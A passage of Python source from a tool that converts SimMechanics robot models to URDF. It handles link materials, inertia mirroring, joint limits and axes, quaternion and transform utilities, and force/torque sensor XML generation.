geometricShape[\"origin\"].split()]\n collisionOrigin = urdf_parser_py.urdf.Pose(collisionOriginVector[0:3], collisionOriginVector[3:6])\n collisionGeometry = self.createGeometry(geometricShape)\n\n collision.origin = collisionOrigin\n collision.geometry = collisionGeometry\n else:\n collision.geometry = visual.geometry\n collision.origin = visual.origin\n\n # Define Material\n visual.material = urdf_parser_py.urdf.Material()\n # Use specified color, if exists. 
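\n # Editor-added note: \"random\" below is actually a deterministic round-robin;\n # getColor() cycles through the fixed COLORS palette and caches the result\n # per mesh name, so repeated conversions of the same model stay stable.\n # Use specified color, if exists. 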
Otherwise, get random color\n if id in self.assignedColors.keys():\n cname = \"%s_color\" % id\n (r, g, b, a) = self.assignedColors[id]\n elif 'color' in linkdict:\n cname = \"%s_color\" % id\n (r, g, b, a) = linkdict['color']\n else:\n (cname, (r, g, b, a)) = self.getColor(linkdict['name'])\n\n visual.material.name = cname\n visual.material.color = urdf_parser_py.urdf.Color(r, g, b, a)\n\n # Create a new gazebo blob for applying colors in the sdf\n gzblobmaterial_el = lxml.etree.Element(\"gazebo\", reference=id)\n gzvisual_el = lxml.etree.SubElement(gzblobmaterial_el, \"visual\")\n gzmaterial_el = lxml.etree.SubElement(gzvisual_el, \"material\")\n\n # Use specified comonents if they exist\n if 'ambient' in linkdict:\n ambient_const = linkdict['ambient']\n ambient_el = lxml.etree.SubElement(gzmaterial_el, \"ambient\")\n ambient_el.text = str(r * ambient_const) + \" \" + str(g * ambient_const) + \" \" + str(\n b * ambient_const) + \" \" + str(a);\n\n if 'diffuse' in linkdict:\n diffuse_const = linkdict['diffuse']\n diffuse_el = lxml.etree.SubElement(gzmaterial_el, \"diffuse\")\n diffuse_el.text = str(r * diffuse_const) + \" \" + str(g * diffuse_const) + \" \" + str(\n b * diffuse_const) + \" \" + str(a);\n\n if 'specular' in linkdict:\n specular_const = linkdict['specular']\n specular_el = lxml.etree.SubElement(gzmaterial_el, \"specular\")\n specular_el.text = str(r * specular_const) + \" \" + str(g * specular_const) + \" \" + str(\n b * specular_const) + \" \" + str(a);\n\n if 'emission' in linkdict:\n emission_const = linkdict['emission']\n emission_el = lxml.etree.SubElement(gzmaterial_el, \"emission\")\n emission_el.text = str(r * emission_const) + \" \" + str(g * emission_const) + \" \" + str(\n b * emission_const) + \" \" + str(a);\n\n # Add the blob only if there is a child inside <gazebo><visual><material>\n if len(gzmaterial_el.getchildren()) > 0:\n addXMLBlob(gzblobmaterial_el, self.XMLBlobs)\n\n else:\n visual = None\n collision = None\n\n ##############################################################\n ### Define Inertial Frame and inertia informations (if this is not a fake link, i.e. 
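\n # Editor-added sketch (not from the original): the <gazebo> material blob\n # assembled above, reduced to a standalone lxml fragment with made-up values:\n #\n # gz = lxml.etree.Element(\"gazebo\", reference=\"some_link\")\n # mat = lxml.etree.SubElement(lxml.etree.SubElement(gz, \"visual\"), \"material\")\n # lxml.etree.SubElement(mat, \"ambient\").text = \"0.1 0.1 0.1 1.0\"\n # lxml.etree.tostring(gz, pretty_print=True) # -> nested XML blob\n #\n ##############################################################\n ### Define the inertial frame and inertia information (if this is not a fake link, i.e. 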
a frame)\n ##############################################################\n if ('mass' in linkdict.keys()):\n\n inertial = urdf_parser_py.urdf.Inertial()\n\n if (id not in self.mirroredInertiaMap):\n # usual: get inertia informations from SimMechanics XML\n units = linkdict['massUnits']\n massval = convert(float(linkdict['mass']), units)\n inertial.mass = massval\n\n # we check if a mass different from the one present in\n # the SimMechanics file is assigned for this link in the\n # yaml file\n inertiaScaling = 1.0;\n\n if (id in self.assignedMasses):\n # if it is, we have to change the mass and scale\n # the inertia by multiplyng by new_mass/old_mass\n # (the COM instead don't need any modification)\n oldMass = inertial.mass;\n newMass = self.assignedMasses[id];\n inertial.mass = newMass;\n inertiaScaling = newMass / oldMass;\n\n matrix = getlist(linkdict[\"inertia\"])\n\n units = linkdict['inertiaUnits']\n\n for i in range(0, len(matrix)):\n matrix[i] = convert(matrix[i], units)\n\n inertial.inertia = urdf_parser_py.urdf.Inertia()\n inertial.inertia.ixx = inertiaScaling * matrix[0]\n inertial.inertia.ixy = inertiaScaling * matrix[1]\n inertial.inertia.ixz = inertiaScaling * matrix[2]\n inertial.inertia.iyy = inertiaScaling * matrix[4]\n inertial.inertia.iyz = inertiaScaling * matrix[5]\n inertial.inertia.izz = inertiaScaling * matrix[8]\n\n if (id in self.assignedInertiasMap):\n # depending on the assigned inertia, we have to modify\n # some values of the inertia matrix. We will check the\n # resulting inertia to make sure that the inertia matrix\n # is still physically consistent\n if ('xx' in self.assignedInertiasMap[id]):\n inertial.inertia.ixx = self.assignedInertiasMap[id]['xx']\n if ('yy' in self.assignedInertiasMap[id]):\n inertial.inertia.iyy = self.assignedInertiasMap[id]['yy']\n if ('zz' in self.assignedInertiasMap[id]):\n inertial.inertia.izz = self.assignedInertiasMap[id]['zz']\n\n if (not self.isValidURDFInertia(inertial.inertia, 1e-3)):\n sys.stderr.write(\"Warning: inertia matrix for link \" + id + \" is not physically consistent.\\n\");\n\n # Inertial origin is the center of gravity\n (off, rot) = self.tfman.get(\"X\" + id, id + \"CG\")\n # print(\"X\"+id+\" to \"+id+\"CG:\")\n # print(off)\n # print(rot)\n rpy = list(euler_from_quaternion(rot))\n\n inertial.origin = urdf_parser_py.urdf.Pose(zero(off), zero(rpy))\n else:\n # if link is mirroredInertia, we should not trust the inertial infromation\n # provided by SimMechanics XML because it could be buggy. 
We will mirror\n # the inertia information of another link instead\n mirroredLink = id\n originalLink = self.mirroredInertiaMap[mirroredLink][\"originalLink\"];\n simmetryReferenceLink = self.mirroredInertiaMap[mirroredLink][\"simmetryReferenceLink\"];\n symmetryPlane = self.mirroredInertiaMap[mirroredLink][\"symmetryPlane\"]\n\n if (not (symmetryPlane == \"xz\")):\n print(\n \"simmechanics_to_urdf: only xz symmetryPlane is supported, please file an issue at https://github.com/robotology-playground/simmechanics-to-urdf/issues/new to get more symmetryPlane supported.\");\n assert (False);\n\n originalLinkDict = self.links[originalLink]\n\n # Mass: the mass is simply copied by the original link\n units = originalLinkDict['massUnits']\n massval = convert(float(originalLinkDict['mass']), units)\n inertial.mass = massval\n\n # COM: we have to express the COM in simmetryReferenceLink,\n # mirror it and then express it in mirroredLink frame\n # T is a 4x4 homogeneous matrix\n # Get {}^simmetryReferenceLink COM\n (off, rot) = self.tfman.get(\"X\" + simmetryReferenceLink, originalLink + \"CG\")\n simmetryRefenceLink_COM = numpy.zeros(4)\n simmetryRefenceLink_COM[0] = off[0]\n simmetryRefenceLink_COM[1] = off[1]\n simmetryRefenceLink_COM[2] = off[2]\n simmetryRefenceLink_COM[3] = 1;\n\n # Get {}^mirroredLink T_simmetryReferenceLink\n mirroredLink_T_simmetryReferenceLink = self.tfman.getHomTransform(\"X\" + mirroredLink,\n \"X\" + simmetryReferenceLink)\n\n # xz simmetry : y --> -y\n simmetryRefenceLink_COM[1] = -simmetryRefenceLink_COM[1];\n\n # {}^mirroredLink COM = {}^mirroredLink T_simmetryReferenceLink {}^simmetryReferenceLink COM\n mirroredLink_COM = numpy.dot(mirroredLink_T_simmetryReferenceLink, simmetryRefenceLink_COM);\n\n off = [0.0, 0.0, 0.0];\n off[0] = mirroredLink_COM[0];\n off[1] = mirroredLink_COM[1];\n off[2] = mirroredLink_COM[2];\n\n # Inertia: the inertia both in SimMechanics XML and URDF\n # is expressed in the COM, so we have only to ensure that the\n # change the orientation of inertia to match the one of the\n # simmetryReferenceLink and change the sign of\n # relevant off diagonal elements (in xz case all the offdiagonal elements related to y)\n # after that we can express the inertia in the frame that we prefer, for example we can leave\n # it in the simmetryReferenceLink, a long as we set the right pose in the inertial tag\n\n # Get {}^originalLinkInertiaFrame R_simmetryReferenceLink\n originalLinkInertiaFrame_T_simmetryReferenceLink = self.tfman.getHomTransform(originalLink + \"CG\",\n \"X\" + simmetryReferenceLink)\n originalLinkInertiaFrame_R_simmetryReferenceLink = originalLinkInertiaFrame_T_simmetryReferenceLink[0:3,\n 0:3];\n\n # Get {}^simmetryReferenceLink R_originalLinkInertiaFrame\n simmetryReferenceLink_T_originalLinkInertiaFrame = self.tfman.getHomTransform(\n \"X\" + simmetryReferenceLink, originalLink + \"CG\")\n simmetryReferenceLink_R_originalLinkInertiaFrame = simmetryReferenceLink_T_originalLinkInertiaFrame[0:3,\n 0:3];\n\n # Get {}^originalLinkInertiaFrame Inertia3D\n matrix = getlist(originalLinkDict[\"inertia\"])\n\n units = originalLinkDict['inertiaUnits']\n for i in range(0, len(matrix)):\n matrix[i] = convert(matrix[i], units)\n\n originalLinkInertiaFrame_Inertia = numpy.reshape(numpy.array(matrix), [3, 3])\n\n assert (self.isValidInertiaMatrix(originalLinkInertiaFrame_Inertia, 1e-3));\n # {}^simmetryReferenceLink Inertia3D = {}^simmetryReferenceLink R_originalLink * {}^originalLink Inertia3D * {}^originalLink R_simmetryReferenceLink\n # 
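\n # Editor-added sketch (not from the original): the xz-plane mirroring used\n # here, in isolation. With F = diag(1, -1, 1), the mirrored inertia is\n # F * I * F, which is exactly the sign flips applied below on the xy and\n # yz products (sample numbers are made up):\n #\n # F = numpy.diag([1.0, -1.0, 1.0])\n # I_orig = numpy.array([[1.0, 0.1, 0.2], [0.1, 2.0, 0.3], [0.2, 0.3, 3.0]])\n # I_mirr = numpy.dot(F, numpy.dot(I_orig, F))\n # assert I_mirr[0, 1] == -I_orig[0, 1] and I_mirr[1, 2] == -I_orig[1, 2]\n # assert I_mirr[0, 2] == I_orig[0, 2] # xz products keep their sign\n #\n # 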
sys.stderr.write(\"simmetryReferenceLink_R_originalLinkInertiaFrame: \" + str(simmetryReferenceLink_R_originalLinkInertiaFrame.shape) +\"\\n\");\n # sys.stderr.write(\"originalLinkInertiaFrame_Inertia: \" + str(originalLinkInertiaFrame_Inertia.shape) +\"\\n\");\n # sys.stderr.write(\"originalLinkInertiaFrame_R_simmetryReferenceLink: \" + str(originalLinkInertiaFrame_R_simmetryReferenceLink.shape) +\"\\n\");\n simmetryReferenceLink_Inertia = numpy.dot(simmetryReferenceLink_R_originalLinkInertiaFrame,\n numpy.dot(originalLinkInertiaFrame_Inertia,\n originalLinkInertiaFrame_R_simmetryReferenceLink))\n\n assert (self.isValidInertiaMatrix(simmetryReferenceLink_Inertia, 1e-3));\n\n # xz simmetry: Ixy --> -Ixy , Iyz ---> -Iyz\n simmetryReferenceLink_Inertia[0, 1] = -simmetryReferenceLink_Inertia[0, 1];\n simmetryReferenceLink_Inertia[1, 0] = -simmetryReferenceLink_Inertia[1, 0];\n simmetryReferenceLink_Inertia[1, 2] = -simmetryReferenceLink_Inertia[1, 2];\n simmetryReferenceLink_Inertia[2, 1] = -simmetryReferenceLink_Inertia[2, 1];\n\n assert (self.isValidInertiaMatrix(simmetryReferenceLink_Inertia, 1e-3));\n\n # The inertia orientation is now the one of R_simmetryReferenceLink, so we have to put in urdf pose {}^mirroredLink R_simmetryReferenceLink\n (off_dummy, rot) = self.tfman.get(\"X\" + mirroredLink, \"X\" + simmetryReferenceLink)\n\n rpy = list(euler_from_quaternion(rot))\n\n # Save inertia matrix\n # sys.stderr.write(\"Inertia RPY of link \" + str(id) + \"is \" + str(rpy) + \"\\n\");\n # sys.stderr.write(\"Inertia matrix of link \" + str(id) + \"is \" + str(simmetryReferenceLink_Inertia) + \"\\n\");\n inertial.inertia = urdf_parser_py.urdf.Inertia()\n inertial.inertia.ixx = simmetryReferenceLink_Inertia[0, 0];\n inertial.inertia.ixy = simmetryReferenceLink_Inertia[0, 1];\n inertial.inertia.ixz = simmetryReferenceLink_Inertia[0, 2];\n inertial.inertia.iyy = simmetryReferenceLink_Inertia[1, 1];\n inertial.inertia.iyz = simmetryReferenceLink_Inertia[1, 2]\n inertial.inertia.izz = simmetryReferenceLink_Inertia[2, 2];\n\n # Save COM and Inertia orientation\n inertial.origin = urdf_parser_py.urdf.Pose(zero(off), zero(rpy))\n\n # Save also Inertial frame in tfman for consistency\n self.tfman.add(zero(off), rot, \"X\" + mirroredLink, mirroredLink + \"CG\")\n else:\n inertial = None\n\n ### add the link\n link = urdf_parser_py.urdf.Link(id, visual, inertial, collision)\n\n self.result.add_link(link)\n\n def getColor(self, s):\n \"\"\" Gets a two element list containing a color name,\n and it's rgba. 
The color selected is based on the mesh name.\n If already seen, returns the saved color\n Otherwise, returns the next available color\"\"\"\n if s in self.colormap:\n return self.colormap[s]\n color = COLORS[self.colorindex]\n self.colormap[s] = color\n self.colorindex = (self.colorindex + 1) % len(COLORS)\n return color\n\n def createGeometry(self, geometricShape):\n \"\"\" Gets an object containing the data to build the geometric shape\"\"\"\n\n shape = geometricShape[\"shape\"]\n if shape == \"sphere\":\n radius = geometricShape[\"radius\"]\n geometry = urdf_parser_py.urdf.Sphere(radius)\n elif shape == \"box\":\n size = geometricShape[\"size\"]\n sizeVector = [float(size_el) for size_el in size.split()]\n geometry = urdf_parser_py.urdf.Box(sizeVector)\n elif shape == \"cylinder\":\n radius = geometricShape[\"radius\"]\n length = geometricShape[\"length\"]\n geometry = urdf_parser_py.urdf.Cylinder(radius, length)\n\n return geometry\n\n def outputJoint(self, id, parentname):\n \"\"\" Outputs URDF for a single joint \"\"\"\n jointdict = self.joints[id]\n\n if \"Root\" in jointdict['name']:\n return\n\n pid = self.getLinkNameByFrame(jointdict['parent'])\n cid = self.getLinkNameByFrame(jointdict['child'])\n\n # If the original joint was reversed while building the tree,\n # swap the two ids\n if parentname != pid:\n cid = pid\n pid = parentname\n\n # Define joint type\n jtype = jointdict['type']\n\n limits = None\n axis = None\n\n if 'limits' in jointdict:\n limits = urdf_parser_py.urdf.JointLimit(None, None)\n for (k, v) in jointdict['limits'].items():\n setattr(limits, k, v)\n if (jtype == \"continuous\"):\n jtype = \"revolute\";\n else:\n # if present, load limits from csv joint configuration file\n # note: angle in csv joints configuration file angles are represented as DEGREES\n if (id in self.joint_configuration):\n conf = self.joint_configuration[id]\n if ((\"upper_limit\" in conf) or\n (\"lower_limit\" in conf) or\n (\"velocity_limit\" in conf) or\n (\"effort_limit\" in conf)):\n limits = urdf_parser_py.urdf.JointLimit()\n if (\"upper_limit\" in conf and conf.get(\"upper_limit\") != \"\"):\n if (jtype == \"prismatic\"):\n limits.upper = float(conf.get(\"upper_limit\"))\n else:\n limits.upper = math.radians(float(conf.get(\"upper_limit\")))\n if (\"lower_limit\" in conf and conf.get(\"lower_limit\") != \"\"):\n if (jtype == \"prismatic\"):\n limits.lower = float(conf.get(\"lower_limit\"))\n else:\n limits.lower = math.radians(float(conf.get(\"lower_limit\")))\n if (\"velocity_limit\" in conf and conf.get(\"velocity_limit\") != \"\"):\n limits.velocity = float(conf.get(\"velocity_limit\"))\n else:\n limits.velocity = self.velocity_limit_fallback\n if (\"effort_limit\" in conf and conf.get(\"effort_limit\") != \"\"):\n limits.effort = float(conf.get(\"effort_limit\"))\n else:\n limits.effort = self.effort_limit_fallback\n # if adding limits, switching the joint type to revolute\n if (jtype == \"continuous\" and\n conf.get(\"upper_limit\") != \"\" and\n conf.get(\"lower_limit\") != \"\"):\n jtype = \"revolute\";\n else:\n # if not limits are defined for a prismatic joint, define them\n # TODO: can we remove this part?\n if (jtype == \"prismatic\"):\n limits = urdf_parser_py.urdf.JointLimit()\n limits.upper = 10000\n limits.lower = -10000\n limits.velocity = 10000\n limits.effort = 10000\n\n # add axis: the axis is expressed in the axisReferenceFrame (normally WORLD)\n # while in the URDF we have to express it in the child frame\n # we have then to properly rotate it.\n if 'axis' in 
jointdict and jtype != 'fixed':\n axis_string = jointdict['axis'].replace(',', ' ')\n\n # print(\"axis string \" + str(axis_string))\n axis = [float(axis_el) for axis_el in axis_string.split()]\n # print(\"axis \" + str(axis))\n if (id in self.reverseRotationAxis):\n for i in range(0, 3):\n axis[i] = -axis[i]\n\n axis_np = numpy.array(axis)\n\n child_H_axisReferenceFrame = self.tfman.getHomTransform(\"X\" + cid, jointdict['axisReferenceFrame']);\n\n axis_child = numpy.dot(child_H_axisReferenceFrame[0:3, 0:3], axis_np);\n\n for i in range(0, 3):\n axis[i] = axis_child[i];\n\n # Define the origin\n (off, rot) = self.tfman.get(\"X\" + pid, \"X\" + cid)\n rpy = list(euler_from_quaternion(rot))\n origin = urdf_parser_py.urdf.Pose(zero(off), zero(rpy))\n\n # adding damping and friction (not from simmechanics but from configuration file)\n joint_damping = self.damping_fallback;\n joint_friction = self.friction_fallback;\n if (id in self.joint_configuration):\n conf = self.joint_configuration[id]\n if \"damping\" in conf:\n joint_damping = float(conf[\"damping\"])\n if \"friction\" in conf:\n joint_friction = float(conf[\"friction\"])\n joint_dynamics = urdf_parser_py.urdf.JointDynamics(damping=joint_damping, friction=joint_friction)\n\n joint = urdf_parser_py.urdf.Joint(id, pid, cid, jtype, limit=limits, axis=axis, origin=origin,\n dynamics=joint_dynamics)\n self.result.add_joint(joint)\n\n def getName(self, basename):\n \"\"\"Return a unique name of the format\n basenameD* where D is the lowest number\n to make the name unique (if the basename is already unique, no number will be added).\n If a rule for renaming basename is defined in the configuration file, the basename\n will be changed.\"\"\"\n index = 0\n if basename in self.rename:\n basename = self.rename[basename]\n name = basename\n while name in self.names:\n name = basename + str(index)\n index = index + 1\n self.names[name] = 1\n return name\n\n def getLinkNameByFrame(self, key):\n \"\"\"Gets the link name from the frame object\"\"\"\n return self.frames[key]['parent']\n\n def graph(self):\n \"\"\"For debugging purposes, output a graphviz\n representation of the tree structure, noting\n which joints have been reversed and which have\n been removed\"\"\"\n graph = \"digraph proe {\\n\"\n for jkey in self.joints:\n joint = self.joints[jkey]\n pref = joint['parent']\n cref = joint['child']\n # label = pref + \":\" + cref\n label = joint['name']\n pkey = self.getLinkNameByFrame(pref)\n ckey = self.getLinkNameByFrame(cref)\n case = 'std'\n if pkey != \"GROUND\":\n parent = self.links[pkey]\n if not ckey in parent['children']:\n child = self.links[ckey]\n if pkey in child['children']:\n case = 'rev'\n else:\n case = 'not'\n pkey = pkey.replace(\"-\", \"_\")\n ckey = ckey.replace(\"-\", \"_\")\n\n if (case == 'std' or case == 'rev') and (joint['type'] != \"fixed\"):\n style = \" penwidth=\\\"5\\\"\"\n else:\n style = \"\";\n\n if case == 'std':\n s = pkey + \" -> \" + ckey + \" [ label = \\\"\" + label + \"\\\"\";\n elif case == 'not':\n s = pkey + \" -> \" + ckey + \" [ label = \\\"\" + label + \"\\\" color=\\\"yellow\\\"\"\n elif case == 'rev':\n s = ckey + \" -> \" + pkey + \" [ label = \\\"\" + label + \"\\\" color=\\\"blue\\\"\"\n s = s + style + \"];\"\n\n if not \"Root\" in s and \"-> SCR_\" not in s:\n graph = graph + s + \"\\n\"\n return graph + \"}\\n\"\n\n def groups(self, root):\n \"\"\" For planning purposes, print out lists of\n all the links between the different joints\"\"\"\n self.groups = {}\n self.makeGroup(root, 
\"BASE\")\n s = \"\"\n for key in self.groups.keys():\n s = s + key + \":\\n\\t\"\n ids = self.groups[key]\n for id in ids:\n s = s + id + \" \"\n s = s + \"\\n\\n\"\n return s\n\n def makeGroup(self, id, gid):\n \"\"\" Helper function for recursively gathering\n groups of joints. \"\"\"\n if gid in self.groups:\n idlist = self.groups[gid]\n idlist.append(id)\n else:\n idlist = [id]\n self.groups[gid] = idlist\n link = self.links[id]\n for child in link['children']:\n jid = link['jointmap'][child]\n joint = self.joints[jid]\n if joint['type'] == 'weld':\n ngid = gid\n else:\n ngid = jid\n\n self.makeGroup(child, ngid)\n\n\ndef addXMLBlobs(blobs, parentXML):\n if not (blobs is None):\n for blob in blobs:\n addXMLBlob(blob, parentXML)\n\n\ndef addXMLBlob(blob, parentXML):\n if not (blob is None or blob is ''):\n if type(blob) is str:\n blob_el = lxml.etree.fromstring(blob);\n parentXML.append(blob_el);\n else:\n parentXML.append(blob);\n else:\n sys.stderr.write(\"Warning: malformed XMLBlob for: \" + parentXML.get(\"name\") + \"\\n\")\n sys.stderr.write(\"Ignoring it\" + \"\\n\")\n\n\ndef quaternion_matrix(quaternion):\n \"\"\"Return homogeneous rotation matrix from quaternion.\n\n>>> R = quaternion_matrix([0.06146124, 0, 0, 0.99810947])\n>>> numpy.allclose(R, rotation_matrix(0.123, (1, 0, 0)))\nTrue\n\n\"\"\"\n q = numpy.array(quaternion[:4], dtype=numpy.float64, copy=True)\n nq = numpy.dot(q, q)\n if nq < _EPS:\n return numpy.identity(4)\n q *= math.sqrt(2.0 / nq)\n q = numpy.outer(q, q)\n return numpy.array((\n (1.0 - q[1, 1] - q[2, 2], q[0, 1] - q[2, 3], q[0, 2] + q[1, 3], 0.0),\n (q[0, 1] + q[2, 3], 1.0 - q[0, 0] - q[2, 2], q[1, 2] - q[0, 3], 0.0),\n (q[0, 2] - q[1, 3], q[1, 2] + q[0, 3], 1.0 - q[0, 0] - q[1, 1], 0.0),\n (0.0, 0.0, 0.0, 1.0)\n ), dtype=numpy.float64)\n\n\ndef quaternion_from_matrix(matrix):\n \"\"\"Return quaternion from rotation matrix.\n\n>>> R = rotation_matrix(0.123, (1, 2, 3))\n>>> q = quaternion_from_matrix(R)\n>>> numpy.allclose(q, [0.0164262, 0.0328524, 0.0492786, 0.9981095])\nTrue\n\n\"\"\"\n q = numpy.empty((4,), dtype=numpy.float64)\n M = numpy.array(matrix, dtype=numpy.float64, copy=False)[:4, :4]\n t = numpy.trace(M)\n if t > M[3, 3]:\n q[3] = t\n q[2] = M[1, 0] - M[0, 1]\n q[1] = M[0, 2] - M[2, 0]\n q[0] = M[2, 1] - M[1, 2]\n else:\n i, j, k = 0, 1, 2\n if M[1, 1] > M[0, 0]:\n i, j, k = 1, 2, 0\n if M[2, 2] > M[i, i]:\n i, j, k = 2, 0, 1\n t = M[i, i] - (M[j, j] + M[k, k]) + M[3, 3]\n q[i] = t\n q[j] = M[i, j] + M[j, i]\n q[k] = M[k, i] + M[i, k]\n q[3] = M[k, j] - M[j, k]\n q *= 0.5 / math.sqrt(t * M[3, 3])\n return q\n\n\ndef getDictionary(tag):\n \"\"\"Builds a dictionary from the specified xml tag\n where each child of the tag is entered into the dictionary\n with the name of the child tag as the key, and the contents\n as the value. 
Also removes quotes from quoted values\"\"\"\n x = {}\n for child in tag.childNodes:\n if child.nodeType is child.TEXT_NODE:\n continue\n key = str(child.localName)\n if len(child.childNodes) == 1:\n data = str(child.childNodes[0].data)\n if data[0] == '\"' and data[-1] == '\"':\n if len(data) != 2:\n x[key] = data[1:-1]\n else:\n x[key] = data\n else:\n data = child.childNodes\n x[key] = data\n return x\n\n\ndef getlist(string):\n \"\"\"Splits a string of comma delimited floats to\n a list of floats\"\"\"\n slist = string.split(\",\")\n flist = []\n for s in slist:\n flist.append(float(s))\n return flist\n\n\ndef convert(value, units):\n \"\"\"Convert value from the specified units to mks units\"\"\"\n if units == 'kg' or units == 'm' or units == 'kg*m^2':\n return value\n elif units == 'slug*in^2':\n return value * SLUGININ2KGMM\n elif units == 'slug':\n return value * SLUG2KG\n elif units == 'in':\n return value * INCH2METER\n elif units == 'mm':\n return value * MM2M\n else:\n raise Exception(\"unsupported mass unit: %s\" % units)\n\n\ndef matrixToQuaternion(matrix):\n \"\"\"Concert 3x3 rotation matrix into a quaternion\"\"\"\n (R11, R12, R13, R21, R22, R23, R31, R32, R33) = matrix\n # Build 4x4 matrix\n M = [[R11, R21, R31, 0],\n [R12, R22, R32, 0],\n [R13, R23, R33, 0],\n [0, 0, 0, 1]]\n A = numpy.array(M)\n [w, x, y, z] = quaternion_from_matrix(A)\n return [w, x, y, z]\n\n\ndef Invert4x4Matrix(matrix):\n \"\"\"Invert a 4x4 rototranslation matrix\"\"\"\n ret_mat = numpy.identity(4)\n R = matrix[:3, :3]\n p = matrix[:3, 3]\n ret_mat[:3, :3] = R.transpose()\n ret_mat[:3, 3] = -numpy.dot(R.transpose(), p)\n return ret_mat\n\n\ndef quaternion_to_rpy(quat):\n \"\"\"Convert quaternion into roll pitch yaw list (in degrees)\"\"\"\n rpy = list(euler_from_quaternion(quat))\n for i in range(0, len(rpy)):\n rpy[i] = rpy[i] * 180 / math.pi\n return rpy\n\n\ndef zero(arr):\n \"\"\"Converts any numbers less than 1e-7 to 0 in the array\"\"\"\n for i in range(0, len(arr)):\n if math.fabs(arr[i]) < 1e-7:\n arr[i] = 0\n return arr\n\n\ndef one(arr):\n \"\"\"In the array 'arr', converts any numbers with difference from 1 less than 1e-7 to 1\"\"\"\n for i in range(0, len(arr)):\n if math.fabs(arr[i]) - 1 < 1e-7:\n arr[i] = numpy.sign(arr[i])\n return arr\n\n\ndef getMatrix(offset, quaternion):\n \"\"\"Convert a quaternion + offset to a 4x4 rototranslation matrix\"\"\"\n return_matrix = quaternion_matrix(quaternion)\n return_matrix[:3, 3] = offset\n return return_matrix\n\n\ndef toGazeboPose(offset, quaternion):\n \"\"\"Convert an offset + quaternion to a 6x1 Gazebo pose string\"\"\"\n rpy = list(euler_from_quaternion(quaternion))\n pose = toGazeboPoseFromEuler(offset, rpy);\n\n return pose;\n\ndef toGazeboPoseFromEuler(offset, rpy):\n \"\"\"Convert an offset + Euler angles to a 6x1 Gazebo pose string\"\"\"\n pose = str(offset[0]) + \" \" + str(offset[1]) + \" \" + str(offset[2]) + \" \" + str(rpy[0]) + \" \" + str(rpy[1]) + \" \" + str(rpy[2]);\n\n return pose;\n\ndef toURDFOriginXMLElement(offset, quaternion):\n \"\"\"Convert an offset + quaternion to a origin URDF element\"\"\"\n rpy = list(euler_from_quaternion(quaternion));\n origin_el = toURDFOriginEulerXMLElement(offset,rpy);\n\n return origin_el;\n\ndef toURDFOriginEulerXMLElement(offset, rpy):\n \"\"\"Convert an offset + Euler angles orientation to a origin URDF element\"\"\"\n origin_el = lxml.etree.Element(\"origin\");\n\n origin_el.set(\"rpy\", str(rpy[0]) + \" \" + str(rpy[1]) + \" \" + str(rpy[2]));\n origin_el.set(\"xyz\", str(offset[0]) + 
\" \" + str(offset[1]) + \" \" + str(offset[2]));\n\n return origin_el;\n\n\nclass CustomTransformManager:\n \"\"\"Custom class to store several transforms between different frames.\n The object can then be queried to obtain the transform between two arbitrary frames. \"\"\"\n\n def __init__(self):\n self.transform_map = {}\n\n def add(self, offset, quaternion, parent, child):\n \"\"\"Store transform for all frames as a list of transform with respect to the world reference frame\"\"\"\n # if parent is the world, store the frame directly\n # print(\"Storing transformation between \" + parent + \" and \" + child)\n # (\"Quaternion : \" +str(quaternion))\n if (parent == WORLD):\n self.transform_map[child] = getMatrix(offset, quaternion)\n # print(str(self.transform_map[child]))\n elif (child == WORLD):\n self.transform_map[parent] = Invert4x4Matrix(getMatrix(offset, quaternion))\n # print(str(self.transform_map[parent]))\n else:\n # check if one between parent and child is already part of the manager\n if (self.transform_map.get(parent) is not None):\n self.transform_map[child] = numpy.dot(self.transform_map[parent], getMatrix(offset, quaternion));\n else:\n sys.stderr.write(\n \"simmechanics_to_urdf: CustomTransformManager: impossible adding a transformation if the parent frame is not already part of the trasforma manager.\\n\")\n sys.stderr.write(\n \" Please file an issue at https://github.com/robotology-playground/simmechanics-to-urdf/issues/new .\\n\");\n assert (False);\n\n def get(self, parent, child):\n \"\"\"Return the rototranslation from child to parent ({}^parent T_child) as offset and quaternion\"\"\"\n # print(\"Getting transformation between \" + parent + \" and \" + child)\n return_matrix = self.getHomTransform(parent, child)\n # print(str(return_matrix))\n off = return_matrix[:3, 3]\n q = quaternion_from_matrix(return_matrix);\n\n return [list(off), list(q)]\n\n def getHomTransform(self, parent, child):\n \"\"\"Return the homogeneous transformation from child to parent ({}^parent T_child) as 4x4 \"\"\"\n if (parent == WORLD and child == WORLD):\n return_matrix = numpy.identity(4)\n elif (parent == WORLD):\n return_matrix = self.transform_map[child]\n elif (child == WORLD):\n return_matrix = Invert4x4Matrix(self.transform_map[parent])\n else:\n return_matrix = numpy.dot(Invert4x4Matrix(self.transform_map[parent]), self.transform_map[child]);\n return return_matrix\n\n\nclass URDFSensorsGenerator:\n \"\"\" Generator for URDF sensors using iDynTree URDF dialect,\n\n See https://github.com/robotology/idyntree/blob/master/doc/model_loading.md .\n \"\"\"\n\n def __init__(self):\n self.dummy = \"\"\n\n def getURDFForceTorque(self, jointName, sensorName, directionChildToParent, frame, origin_el):\n sensor_el = lxml.etree.Element(\"sensor\")\n sensor_el.set(\"name\", sensorName);\n sensor_el.set(\"type\", \"force_torque\");\n parent_el = lxml.etree.SubElement(sensor_el, \"parent\");\n parent_el.set(\"joint\", jointName);\n force_torque_el = lxml.etree.SubElement(sensor_el, \"force_torque\")\n frame_el = lxml.etree.SubElement(force_torque_el, \"frame\")\n if (frame is not None):\n assert(frame == \"child\" or frame == \"parent\" or frame == \"sensor\")\n frame_el.text = frame;\n else:\n frame_el.text = \"child\";\n measure_direction_el = lxml.etree.SubElement(force_torque_el, \"measure_direction\")\n if (directionChildToParent):\n measure_direction_el.text = \"child_to_parent\"\n else:\n measure_direction_el.text = \"parent_to_child\"\n sensor_el.append(origin_el);\n return 
